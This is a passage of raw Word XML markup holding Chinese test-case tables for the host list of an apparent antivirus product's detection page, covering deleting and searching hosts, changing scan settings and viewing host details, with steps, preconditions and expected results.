                  <wp:docPr id="550" name="图片 550" descr="C:\Users\PC-2\AppData\Local\Temp\1529485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PC-2\AppData\Local\Temp\1529485483(1).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4104005" cy="2680970"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="33A19CEB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53C5CA95"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65F99A4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>成功删除列表中的一个主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="17B3B917" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0DC381"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5D12076D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D06EAF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="_Toc36487978"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>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58C36F7E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B332CC8"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6549BC23" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>搜索主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="231CDFFB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C991A60"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7895BA66" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>根据输入的关键字从主机列表中搜索</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0CC3A473" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C95CA7"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38F43C8C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="72235F3E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48887E3C"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375F8EF3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FBE13C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表上方的搜索输入框，输入想要搜索的关键字，比如“23”；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FC9649" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击输入框右侧的搜索按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291E400B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看匹配到的主机列表。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088BB174" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22646808" wp14:editId="00F7C6F6">
                  <wp:extent cx="4175760" cy="1728470"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="24130"/>
                  <wp:docPr id="19" name="图片 19" descr="C:\Users\PC-2\AppData\Local\Temp\15294858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PC-2\AppData\Local\Temp\1529485837(1).png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId116" cstate="print">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect t="12773"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4175760" cy="1728470"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="51BC5F6E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5209BEE4"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5AED03EC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>输入关键字搜索到匹配的主机列表</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="19791A19" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A5F1FA"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7340D6B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55EAE3CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="_Toc36487979"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改扫描设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>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7B35485D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3254EA"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38F0713F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>修改扫描设置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4CF5E889" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462606C1"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3BDDF467" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>修改病毒扫描的设置选项。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4DF4B11D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E6B6CD"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7DFF8094" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="45B09257" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3B8F69"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6AF97BDE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0011F3DB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击列表上方的“扫描设置”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC4C3F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>修改弹窗中展示的选项；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569DD4E9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“保存设置”按钮。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FFDC662"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noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C988CDB" wp14:editId="43607DF5">
                  <wp:extent cx="4211955" cy="2816225"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
                  <wp:docPr id="551" name="图片 551" descr="C:\Users\PC-2\AppData\Local\Temp\1529487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PC-2\AppData\Local\Temp\1529487613(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4211955" cy="2816225"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4AA42562" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21EAED72"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4CA40016" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>扫描设置被成功修改</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1FB57F8C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163AEED4"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6DE906C4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10EAD888" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc36487980"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看主机详细信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>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6CCE95BE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C819580"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32511CE7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看主机详细信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0E504859" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C539355"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3D4800B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看主机的详细信息</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7B5120AC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F425F8"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0961784F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="06D7B8D2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="725F6C9A"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51D6558B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="269C8A3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表中一个主机右侧的“详细信息”链接，进入主机详情页面。</w:t>
